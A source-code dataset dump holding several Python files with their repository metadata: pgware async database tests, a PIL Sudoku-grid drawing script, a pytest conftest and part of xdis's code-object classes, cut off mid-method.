| 36
| 0.921875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
178c5f88c150784b1be1c10c3ea1132a6732d1a4
| 13,499
|
py
|
Python
|
tests/test_pgware_async.py
|
PieterjanMontens/pgware
|
c8bab60810ac6916aae01f7343e7c5149d4a79a0
|
[
"MIT"
] | 1
|
2020-06-11T08:31:55.000Z
|
2020-06-11T08:31:55.000Z
|
tests/test_pgware_async.py
|
PieterjanMontens/pgware
|
c8bab60810ac6916aae01f7343e7c5149d4a79a0
|
[
"MIT"
] | 4
|
2020-03-24T17:17:28.000Z
|
2021-06-02T00:16:44.000Z
|
tests/test_pgware_async.py
|
PieterjanMontens/pgware
|
c8bab60810ac6916aae01f7343e7c5149d4a79a0
|
[
"MIT"
] | null | null | null |
# pylint: skip-file
import pytest
import pgware as pgware
pytestmark = pytest.mark.asyncio
def pytest_generate_tests(metafunc):
if 'db_cfg' in metafunc.fixturenames:
metafunc.parametrize('db_cfg', ['asyncpg', 'psycopg2'], indirect=True)
@pytest.fixture
def db_cfg(request):
return {
'client': request.param,
'database': '[DB]',
'user': '[USER]',
'password': None,
'host': '[HOST]',
'port': None,
'connection_type': 'single',
}
async def test_single_connect(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
assert(pgw.backend == db_cfg['client'])
async def test_preheat(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
await pgw.preheat_async()
async with pgw.get_connection().cursor():
pass
async def test_cursor(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
async with pgw.get_connection().cursor():
pass
async def test_close(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
async with pgw.get_connection() as conn:
conn.close()
async def test_close_all(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
async with pgw.get_connection():
pass
await pgw.close_all()
async def test_cursor_query_async(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
async with pgw.get_connection().cursor() as cur:
await cur.execute('select 1')
result = await cur.fetchone()
assert(1 == result['?column?'])
async with pgw.get_connection().cursor() as cur:
await cur.execute('select 2')
result = await cur.fetchone()
assert(2 == result['?column?'])
async def test_query_async(db_cfg, event_loop):
pgw = pgware.build(output='dict', **db_cfg)
async with pgw.get_connection() as cur:
result = await cur.fetchone('select 1')
assert(1 == result['?column?'])
async def test_psycogp2_syntax(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='psycopg2', **db_cfg)
async with pgw.get_connection() as pg:
result = await pg.fetchone('select %s as one, %s as two', ('pouly', 'croc'))
assert('pouly' == result['one'])
assert('croc' == result['two'])
async with pgw.get_connection() as pg:
result = await pg.fetchone(
'select %(qui)s as one, %(quoi)s as two',
{'quoi': 'pouly', 'qui': 'croc'}
)
assert('croc' == result['one'])
assert('pouly' == result['two'])
async def test_asyncpg_syntax(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
async with pgw.get_connection() as pg:
result = await pg.fetchone('select $1 as one, $2 as two', ('pouly', 'croc'))
assert('pouly' == result['one'])
assert('croc' == result['two'])
result = await pg.fetchone('select $2 as one, $1 as two', ('pouly', 'croc'))
assert('croc' == result['one'])
assert('pouly' == result['two'])
async def test_json_querying(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
async with pgw.get_connection() as pg:
result = await pg.fetchone(
'select $1::jsonb as json',
({'sauce': "andalouse"},))
assert('andalouse' == result['json']['sauce'])
result = await pg.fetchone(
'select $1::jsonb as json',
(['andalouse'],))
assert('andalouse' == result['json'][0])
async def test_prepared_cursor_query_params_postgresql(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
async with pgw.get_connection().cursor() as conn:
stmt = await conn.prepare('select $1 as one, $2 as two')
await stmt.execute(('pouly', 'croc'))
result = await stmt.fetchone()
assert('pouly' == result['one'])
assert('croc' == result['two'])
await stmt.execute(('mexi', 'canos'))
result = await stmt.fetchone()
assert('mexi' == result['one'])
assert('canos' == result['two'])
async def test_prepared_query_params_postgresql(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
async with pgw.get_connection() as conn:
stmt = await conn.prepare('select $1 as one, $2 as two')
result = await stmt.fetchone(('frites', 'mayo'))
assert('frites' == result['one'])
assert('mayo' == result['two'])
result = await stmt.fetchone(('frites', 'ketchup'))
assert('frites' == result['one'])
assert('ketchup' == result['two'])
async def test_prepared_query_params_psycopg2(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='psycopg2', **db_cfg)
async with pgw.get_connection() as conn:
stmt = await conn.prepare('select %s as one, %s as two')
result = await stmt.fetchone(('frites', 'mayo'))
assert('frites' == result['one'])
assert('mayo' == result['two'])
result = await stmt.fetchone(('frites', 'ketchup'))
assert('frites' == result['one'])
assert('ketchup' == result['two'])
async def test_public_methods(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
# Test all methods in all possible combinations
async with pgw.get_connection() as cur:
await cur.executemany('SELECT $1 as one, $2 as two', [('frites', 'ketchup'), ('frites', 'moutarde')])
async with pgw.get_connection().cursor() as cur:
result = await cur.fetchval('select \'mayo\' as one')
assert result == 'mayo'
await cur.execute('select \'mexicanos\' as one')
result = await cur.fetchval()
assert result == 'mexicanos'
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchval(('frites', 'mayo'))
assert result == 'frites'
result = await cur.fetchval('select $1 as one', ('ketchup',))
assert result == 'ketchup'
await cur.execute('select \'fricadelle\' as one')
result = await cur.fetchval()
assert result == 'fricadelle'
async with pgw.get_connection() as cur:
result = await cur.fetchval('select \'mayo\' as one')
assert result == 'mayo'
await cur.execute('select \'mexicanos\' as one')
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchval(('frites', 'mayo'))
assert result == 'frites'
result = await cur.fetchval('select $1 as one', ('ketchup',))
assert result == 'ketchup'
await cur.execute('select \'fricadelle\' as one')
async with pgw.get_connection().cursor() as cur:
result = await cur.fetchone('select \'mayo\' as one')
assert result['one'] == 'mayo'
await cur.execute('select \'mexicanos\' as one')
result = await cur.fetchone()
assert result['one'] == 'mexicanos'
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchone(('frites', 'mayo'))
assert result['one'] == 'frites'
result = await cur.fetchone('select $1 as one', ('ketchup',))
assert result['one'] == 'ketchup'
await cur.execute('select \'fricadelle\' as one')
result = await cur.fetchone()
assert result['one'] == 'fricadelle'
async with pgw.get_connection() as cur:
result = await cur.fetchone('select \'mayo\' as one')
assert result['one'] == 'mayo'
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchone(('frites', 'mayo'))
assert result['one'] == 'frites'
result = await cur.fetchone('select $1 as one', ('ketchup',))
assert result['one'] == 'ketchup'
async with pgw.get_connection().cursor() as cur:
result = await cur.fetchall('select \'mayo\' as one')
assert result[0]['one'] == 'mayo'
await cur.execute('select \'mexicanos\' as one')
result = await cur.fetchall()
assert result[0]['one'] == 'mexicanos'
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchall(('frites', 'mayo'))
assert result[0]['one'] == 'frites'
result = await cur.fetchall('select $1 as one', ('ketchup',))
assert result[0]['one'] == 'ketchup'
await cur.execute('select \'fricadelle\' as one')
result = await cur.fetchall()
assert result[0]['one'] == 'fricadelle'
async with pgw.get_connection() as cur:
result = await cur.fetchall('select \'mayo\' as one')
assert result[0]['one'] == 'mayo'
stmt = await cur.prepare('select $1 as one, $2 as two')
result = await stmt.fetchall(('frites', 'mayo'))
assert result[0]['one'] == 'frites'
result = await cur.fetchall('select $1 as one', ('ketchup',))
assert result[0]['one'] == 'ketchup'
await pgw.close_all()
async def test_dict_outputs(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
async with pgw.get_connection() as pgw:
await pgw.execute("""
CREATE TEMPORARY TABLE pgware_test (
one varchar(50),
two int,
three boolean
)
""")
await pgw.execute("INSERT INTO pgware_test VALUES ('pgware', 2, TRUE)")
result = await pgw.fetchone("SELECT * FROM pgware_test")
assert(isinstance(result, dict))
assert(result['one'] == 'pgware')
assert(result['two'] == 2)
assert(result['three'] is True)
result = await pgw.fetchall("SELECT * FROM pgware_test")
assert(isinstance(result[0], dict))
assert(result[0]['one'] == 'pgware')
assert(result[0]['two'] == 2)
assert(result[0]['three'] is True)
result = await pgw.fetchval("SELECT * FROM pgware_test")
assert(result == 'pgware')
async def test_list_outputs(db_cfg, event_loop):
pgw = pgware.build(output='list', param_format='postgresql', **db_cfg)
async with pgw.get_connection() as pgw:
await pgw.execute("""
CREATE TEMPORARY TABLE pgware_test (
one varchar(50),
two int,
three boolean
)
""")
await pgw.execute("INSERT INTO pgware_test VALUES ('pgware', 2, TRUE)")
result = await pgw.fetchone("SELECT * FROM pgware_test")
assert(isinstance(result, list))
assert(result[0] == 'pgware')
assert(result[1] == 2)
assert(result[2] is True)
result = await pgw.fetchall("SELECT * FROM pgware_test")
assert(isinstance(result, list))
assert(isinstance(result[0], list))
assert(result[0][0] == 'pgware')
assert(result[0][1] == 2)
assert(result[0][2] is True)
result = await pgw.fetchval("SELECT * FROM pgware_test")
assert(result == 'pgware')
async def test_native_outputs(db_cfg, event_loop):
pgw = pgware.build(output='native', param_format='postgresql', **db_cfg)
# Both native formats allow access to values by index or by name
async with pgw.get_connection() as pgw:
await pgw.execute("""
CREATE TEMPORARY TABLE pgware_test (
one varchar(50),
two int,
three boolean
)
""")
await pgw.execute("INSERT INTO pgware_test VALUES ('pgware', 2, TRUE)")
result = await pgw.fetchone("SELECT * FROM pgware_test")
assert(result[0] == 'pgware')
assert(result[1] == 2)
assert(result[2] is True)
assert(result['one'] == 'pgware')
assert(result['two'] == 2)
assert(result['three'] is True)
result = await pgw.fetchall("SELECT * FROM pgware_test")
assert(result[0][0] == 'pgware')
assert(result[0][1] == 2)
assert(result[0][2] is True)
assert(result[0]['one'] == 'pgware')
assert(result[0]['two'] == 2)
assert(result[0]['three'] is True)
result = await pgw.fetchval("SELECT * FROM pgware_test")
assert(result == 'pgware')
async def test_iterator(db_cfg, event_loop):
pgw = pgware.build(output='dict', param_format='postgresql', **db_cfg)
# Both native formats allow access to values by index or by name
async with pgw.get_connection().cursor() as cur:
await cur.execute("""
CREATE TEMPORARY TABLE pgware_test (
one varchar(50),
two int,
three boolean
)
""")
await cur.execute("INSERT INTO pgware_test VALUES ('pgware', 2, TRUE)")
await cur.execute("INSERT INTO pgware_test VALUES ('pgloop', 3, FALSE)")
await cur.fetchall("SELECT * FROM pgware_test")
out = []
async for row in cur:
out.append(row)
print(row)
print(out)
assert out[0]['one'] == 'pgware'
assert out[1]['one'] == 'pgloop'
await cur.execute("INSERT INTO pgware_test VALUES ('pglimp', 4, FALSE)")
await cur.execute("SELECT * FROM pgware_test")
out = []
async for row in cur:
out.append(row)
print(row)
assert out[0]['one'] == 'pgware'
assert out[1]['one'] == 'pgloop'
assert out[2]['one'] == 'pglimp'
| 35.153646
| 109
| 0.593229
| 1,692
| 13,499
| 4.637707
| 0.083333
| 0.077992
| 0.038231
| 0.047789
| 0.890022
| 0.853192
| 0.853065
| 0.8379
| 0.810883
| 0.779406
| 0
| 0.010205
| 0.252315
| 13,499
| 383
| 110
| 35.245431
| 0.767264
| 0.014001
| 0
| 0.717687
| 1
| 0
| 0.229688
| 0
| 0
| 0
| 0
| 0
| 0.295918
| 1
| 0.006803
| false
| 0.013605
| 0.006803
| 0.003401
| 0.017007
| 0.010204
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bdd934d6f1c7ad566e454e694343d565177024f3
| 1,737
|
py
|
Python
|
Draw.py
|
Hasnae-bouhmady/Sudoku-Solver-machine-learning
|
9cf967d274df24ba473c12134f7d91ffbd3637bc
|
[
"MIT"
] | 3
|
2021-12-12T23:26:23.000Z
|
2022-02-02T20:43:56.000Z
|
Draw.py
|
Hasnae-bouhmady/Sudoku-Solver-machine-learning
|
9cf967d274df24ba473c12134f7d91ffbd3637bc
|
[
"MIT"
] | null | null | null |
Draw.py
|
Hasnae-bouhmady/Sudoku-Solver-machine-learning
|
9cf967d274df24ba473c12134f7d91ffbd3637bc
|
[
"MIT"
] | 1
|
2021-12-12T23:30:13.000Z
|
2021-12-12T23:30:13.000Z
|
from PIL import Image, ImageDraw
from PIL import ImageFont
def draw(puzzle,solution):
im = Image.new('RGBA', (900, 900), (255, 255, 255, 255))
draw = ImageDraw.Draw(im)
for i in range(4):
draw.line((i*300,0,i*300,900), (0,0,0,255),5)
draw.line((0,i*300,900,i*300), (0,0,0,255),5)
for j in range(2):
draw.line((i * 300+(j+1)*100, 0, i * 300 + (j+1)*100, 900), (0, 0, 0, 255), 2)
draw.line((0,i * 300 + (j + 1) * 100,900, i * 300 + (j + 1) * 100), (0, 0, 0, 255),2)
font = ImageFont.truetype(r'C:\Users\System-Pc\Desktop\arial.ttf', 50)
for i in range(9):
for j in range(9):
if puzzle[j][i] != 0 :
draw.text((i*100+35,j*100+25),str(puzzle[j][i]), fill =(0,0,0,255),font = font,align="center")
else:
draw.text((i * 100 + 35, j * 100 + 25), str(solution[j][i]), fill=(122, 0, 0, 255), font=font,align="center")
im.show()
def draw1(puzzle):
im = Image.new('RGBA', (900, 900), (255, 255, 255, 255))
draw = ImageDraw.Draw(im)
for i in range(4):
draw.line((i*300,0,i*300,900), (0,0,0,255),5)
draw.line((0,i*300,900,i*300), (0,0,0,255),5)
for j in range(2):
draw.line((i * 300+(j+1)*100, 0, i * 300 + (j+1)*100, 900), (0, 0, 0, 255), 2)
draw.line((0,i * 300 + (j + 1) * 100,900, i * 300 + (j + 1) * 100), (0, 0, 0, 255),2)
font = ImageFont.truetype(r'C:\Users\System-Pc\Desktop\arial.ttf', 50)
for i in range(9):
for j in range(9):
if puzzle[j][i] != 0 :
draw.text((i*100+35,j*100+25),str(puzzle[j][i]), fill =(0,0,0,255),font = font,align="center")
im.show()
| 44.538462
| 126
| 0.498561
| 314
| 1,737
| 2.757962
| 0.165605
| 0.048499
| 0.06351
| 0.069284
| 0.878753
| 0.878753
| 0.878753
| 0.878753
| 0.878753
| 0.810624
| 0
| 0.214685
| 0.278641
| 1,737
| 38
| 127
| 45.710526
| 0.476457
| 0
| 0
| 0.823529
| 0
| 0
| 0.057715
| 0.042403
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.058824
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
da89047413ad2042a10b92f2f2b3efe7e14a6f61
| 123
|
py
|
Python
|
tests/conftest.py
|
pactfi/pact-py-sdk
|
139ad7016b852cf971cb3af555a5229b5f373298
|
[
"MIT"
] | 6
|
2022-02-21T11:58:35.000Z
|
2022-02-24T08:03:58.000Z
|
tests/conftest.py
|
pactfi/pact-py-sdk
|
139ad7016b852cf971cb3af555a5229b5f373298
|
[
"MIT"
] | 1
|
2022-02-22T10:46:35.000Z
|
2022-02-22T11:13:00.000Z
|
tests/conftest.py
|
pactfi/pact-py-sdk
|
139ad7016b852cf971cb3af555a5229b5f373298
|
[
"MIT"
] | null | null | null |
import pytest
from tests.utils import make_fresh_testbed
@pytest.fixture
def testbed():
return make_fresh_testbed()
| 13.666667
| 42
| 0.788618
| 17
| 123
| 5.470588
| 0.647059
| 0.193548
| 0.344086
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146341
| 123
| 8
| 43
| 15.375
| 0.885714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
16ff78cd1526af5ce49403f57c5b724cf8e579d0
| 20,710
|
py
|
Python
|
S4/S4 Decompiler/Old Libraries/xdis/code.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | 1
|
2021-05-20T19:33:37.000Z
|
2021-05-20T19:33:37.000Z
|
S4/S4 Decompiler/Old Libraries/xdis/code.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | null | null | null |
S4/S4 Decompiler/Old Libraries/xdis/code.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | null | null | null |
# (C) Copyright 2017-2019 by Rocky Bernstein
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from xdis import PYTHON3
import inspect, types
class Code3:
"""Class for a Python3 code object used when a Python interpreter less than 3 is
working on Python3 bytecode. It also functions as an object that can be used
to build or write a Python3 code object, since we allow mutable structures.
When done mutating, call method freeze().
For convenience in generating code objects, fields like
`co_consts`, co_names which are (immutable) tuples in the end-result can be stored
instead as (mutable) lists. Likewise the line number table `co_lnotab`
can be stored as a simple list of offset, line_number tuples.
"""
def __init__(
self,
co_argcount,
co_kwonlyargcount,
co_nlocals,
co_stacksize,
co_flags,
co_code,
co_consts,
co_names,
co_varnames,
co_filename,
co_name,
co_firstlineno,
co_lnotab,
co_freevars,
co_cellvars,
):
self.co_argcount = co_argcount
self.co_kwonlyargcount = co_kwonlyargcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
self.co_name = co_name
self.co_firstlineno = co_firstlineno
self.co_lnotab = co_lnotab
self.co_freevars = co_freevars
self.co_cellvars = co_cellvars
# Mimic Python 3 code access functions
def __len__(self):
return len(self.co_code)
def __getitem__(self, i):
op = self.co_code[i]
if isinstance(op, str):
op = ord(op)
return op
def encode_lineno_tab(self):
co_lnotab = b""
prev_line_number = self.co_firstlineno
prev_offset = 0
for offset, line_number in self.co_lnotab:
offset_diff = offset - prev_offset
line_diff = line_number - prev_line_number
prev_offset = offset
prev_line_number = line_number
while offset_diff >= 256:
co_lnotab += bytearray([255, 0])
offset_diff -= 255
while line_diff >= 256:
co_lnotab += bytearray([0, 255])
line_diff -= 255
co_lnotab += bytearray([offset_diff, line_diff])
self.co_lnotab = co_lnotab
def freeze(self):
for field in "co_consts co_names co_varnames co_freevars co_cellvars".split():
val = getattr(self, field)
if isinstance(val, list):
setattr(self, field, tuple(val))
if isinstance(self.co_lnotab, dict):
d = self.co_lnotab
self.co_lnotab = sorted(zip(d.keys(), d.values()), key=lambda tup: tup[0])
if isinstance(self.co_lnotab, list):
# We assume we have a list of tuples:
# (offset, linenumber) which we convert
# into the encoded format
self.encode_lineno_tab()
if PYTHON3:
args = (
self.co_argcount,
self.co_kwonlyargcount,
self.co_nlocals,
self.co_stacksize,
self.co_flags,
self.co_code,
self.co_consts,
self.co_names,
self.co_varnames,
self.co_filename,
self.co_name,
self.co_firstlineno,
self.co_lnotab,
self.co_freevars,
self.co_cellvars,
)
return types.CodeType(*args)
else:
return self
def check(self):
for field in "co_argcount co_kwonlyargcount, co_nlocals co_flags co_firstlineno".split():
val = getattr(self, field)
assert isinstance(val, int), "%s should be int, is %s" % (field, type(val))
for field in "co_consts co_names co_varnames".split():
val = getattr(self, field)
assert isinstance(val, tuple), "%s should be tuple, is %s" % (
field,
type(val),
)
class Code38(Code3):
"""Class for a Python3.8 code object used when a Python interpreter less than 3.8 is
working on Python3 bytecode. It also functions as an object that can be used
to build or write a Python3 code object, since we allow mutable structures.
When done mutating, call method freeze().
For convenience in generating code objects, fields like
`co_consts`, co_names which are (immutable) tuples in the end-result can be stored
instead as (mutable) lists. Likewise the line number table `co_lnotab`
can be stored as a simple list of offset, line_number tuples.
"""
def __init__(
self,
co_argcount,
co_posonlyargcount,
co_kwonlyargcount,
co_nlocals,
co_stacksize,
co_flags,
co_code,
co_consts,
co_names,
co_varnames,
co_filename,
co_name,
co_firstlineno,
co_lnotab,
co_freevars,
co_cellvars,
):
self.co_argcount = co_argcount
self.co_posonlyargcount = co_posonlyargcount
self.co_kwonlyargcount = co_kwonlyargcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
self.co_name = co_name
self.co_firstlineno = co_firstlineno
self.co_lnotab = co_lnotab
self.co_freevars = co_freevars
self.co_cellvars = co_cellvars
def freeze(self):
# FIXME we could call super and ten have just the diffs below
for field in "co_consts co_names co_varnames co_freevars co_cellvars".split():
val = getattr(self, field)
if isinstance(val, list):
setattr(self, field, tuple(val))
if isinstance(self.co_lnotab, dict):
d = self.co_lnotab
self.co_lnotab = sorted(zip(d.keys(), d.values()), key=lambda tup: tup[0])
if isinstance(self.co_lnotab, list):
# We assume we have a list of tuples:
# (offset, linenumber) which we convert
# into the encoded format
self.encode_lineno_tab()
if PYTHON_VERSION >= 3.8:
args = (
self.co_argcount,
self.co_posonlyargcount,
self.co_kwonlyargcount,
self.co_nlocals,
self.co_stacksize,
self.co_flags,
self.co_code,
self.co_consts,
self.co_names,
self.co_varnames,
self.co_filename,
self.co_name,
self.co_firstlineno,
self.co_lnotab,
self.co_freevars,
self.co_cellvars,
)
return types.CodeType(*args)
else:
return self
def check(self):
for field in "co_argcount co_posonlyargcount co_kw_onlyargcount co_nlocals co_flags co_firstlineno".split():
val = getattr(self, field)
assert isinstance(val, int), "%s should be int, is %s" % (field, type(val))
for field in "co_consts co_names co_varnames".split():
val = getattr(self, field)
assert isinstance(val, tuple), "%s should be tuple, is %s" % (
field,
type(val),
)
class Code3Compat(Code3):
"""A much more flexible version of Code. We don't require
kwonlyargcount which does't exist in Python 2. You can also fill
in what you want and leave the rest blank. Remmeber though to
call inherited function freeze when done.
"""
def __init__(
self,
co_argcount=0,
co_kwonlyargcount=0,
co_nlocals=0,
co_stacksize=0,
co_flags=[],
co_code=[],
co_consts=[],
co_names=[],
co_varnames=[],
co_filename="unknown",
co_name="unknown",
co_firstlineno=1,
co_lnotab="",
co_freevars=[],
co_cellvars=[],
):
self.co_argcount = co_argcount
self.co_kwonlyargcount = co_kwonlyargcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
self.co_name = co_name
self.co_firstlineno = co_firstlineno
self.co_lnotab = co_lnotab
self.co_freevars = co_freevars
self.co_cellvars = co_cellvars
def __repr__(self):
return '<code3 object %s at 0x%0x, file "%s", line %d>' % (
self.co_name,
id(self),
self.co_filename,
self.co_firstlineno,
)
def code3compat(co):
return Code3Compat(
co.co_argcount,
co.co_kwonlyargcount,
co.co_nlocals,
co.co_stacksize,
co.co_flags,
co.co_code,
co.co_consts,
co.co_names,
co.co_varnames,
co.co_filename,
co.co_name,
co.co_firstlineno,
co.co_lnotab,
co.co_freevars,
co.co_cellvars,
)
class Code2:
"""Class for a Python2 code object used when a Python 3 interpreter is
working on Python2 bytecode. It also functions as an object that can be used
to build or write a Python2 code object, since we allow mutable structures.
When done mutating, call method freeze().
For convenience in generating code objects, fields like
`co_consts`, co_names which are (immutable) tuples in the end-result can be stored
instead as (mutable) lists. Likewise the line number table `co_lnotab`
can be stored as a simple list of offset, line_number tuples.
"""
def __init__(
self,
co_argcount,
co_kwonlyargcount,
co_nlocals,
co_stacksize,
co_flags,
co_code,
co_consts,
co_names,
co_varnames,
co_filename,
co_name,
co_firstlineno,
co_lnotab,
co_freevars,
co_cellvars,
):
self.co_argcount = co_argcount
# Note: There is no kwonlyargcount in Python2
self.co_kwonlyargcount = co_kwonlyargcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
self.co_name = co_name
self.co_firstlineno = co_firstlineno
self.co_lnotab = co_lnotab
self.co_freevars = co_freevars
self.co_cellvars = co_cellvars
return
# Mimic Python 3 code access functions
def __len__(self):
return len(self.co_code)
def __getitem__(self, i):
op = self.co_code[i]
if isinstance(op, str):
op = ord(op)
return op
def encode_lineno_tab(self):
co_lnotab = ""
prev_line_number = self.co_firstlineno
prev_offset = 0
for offset, line_number in self.co_lnotab:
offset_diff = offset - prev_offset
line_diff = line_number - prev_line_number
prev_offset = offset
prev_line_number = line_number
while offset_diff >= 256:
co_lnotab.append(chr(255))
co_lnotab.append(chr(0))
offset_diff -= 255
while line_diff >= 256:
co_lnotab.append(chr(0))
co_lnotab.append(chr(255))
line_diff -= 255
co_lnotab += chr(offset_diff)
co_lnotab += chr(line_diff)
self.co_lnotab = co_lnotab
def freeze(self):
for field in "co_consts co_names co_varnames co_freevars co_cellvars".split():
val = getattr(self, field)
if isinstance(val, list):
setattr(self, field, tuple(val))
if isinstance(self.co_lnotab, dict):
d = self.co_lnotab
self.co_lnotab = sorted(zip(d.keys(), d.values()), key=lambda tup: tup[0])
if isinstance(self.co_lnotab, list):
# We assume we have a list of tuples:
# (offset, linenumber) which we convert
# into the encoded format
# FIXME: handle PYTHON 3
self.encode_lineno_tab()
if PYTHON3:
if hasattr(self, "co_kwonlyargcount"):
delattr(self, "co_kwonlyargcount")
return self
else:
args = (
self.co_argcount,
self.co_nlocals,
self.co_stacksize,
self.co_flags,
self.co_code,
self.co_consts,
self.co_names,
self.co_varnames,
self.co_filename,
self.co_name,
self.co_firstlineno,
self.co_lnotab,
self.co_freevars,
self.co_cellvars,
)
return types.CodeType(*args)
def check(self):
for field in "co_argcount co_nlocals co_flags co_firstlineno".split():
val = getattr(self, field)
assert isinstance(val, int), "%s should be int, is %s" % (field, type(val))
for field in "co_consts co_names co_varnames".split():
val = getattr(self, field)
assert isinstance(val, tuple), "%s should be tuple, is %s" % (
field,
type(val),
)
class Code2Compat(Code2):
"""A much more flexible version of Code. We don't require kwonlyargcount which
doesn't exist. You can also fill in what you want and leave the rest blank.
Remember though to call inherited function freeze when done.
"""
def __init__(
self,
co_argcount=0,
co_nlocals=0,
co_stacksize=0,
co_flags=[],
co_code=[],
co_consts=[],
co_names=[],
co_varnames=[],
co_filename="unknown",
co_name="unknown",
co_firstlineno=1,
co_lnotab="",
co_freevars=[],
co_cellvars=[],
):
self.co_argcount = co_argcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
self.co_name = co_name
self.co_firstlineno = co_firstlineno
self.co_lnotab = co_lnotab
self.co_freevars = co_freevars
self.co_cellvars = co_cellvars
def __repr__(self):
return '<code2 object %s at 0x%0x, file "%s", line %d>' % (
self.co_name,
id(self),
self.co_filename,
self.co_firstlineno,
)
class Code14:
"""Class for a Python 1.4 code object used when a Python 2 or 3 interpreter is
working on Python 1.4 bytecode. It also functions as an object that can be used
to build or write a Python 1.4 code object, since we allow mutable structures.
When done mutating, call method freeze().
For convenience in generating code objects, fields like
`co_consts`, co_names which are (immutable) tuples in the end-result can be stored
instead as (mutable) lists. Likewise the line number table `co_lnotab`
can be stored as a simple list of offset, line_number tuples.
"""
def __init__(
self,
co_argcount,
co_kwonlyargcount,
co_nlocals,
co_stacksize,
co_flags,
co_code,
co_consts,
co_names,
co_varnames,
co_filename,
co_name,
co_firstlineno,
co_lnotab,
co_freevars,
co_cellvars,
):
self.co_argcount = co_argcount
# Note: There is no kwonlyargcount in Python2
self.co_kwonlyargcount = co_kwonlyargcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
self.co_name = co_name
self.co_freevars = co_freevars
self.co_cellvars = co_cellvars
return
# Mimic Python 3 code access functions
def __len__(self):
return len(self.co_code)
def __getitem__(self, i):
op = self.co_code[i]
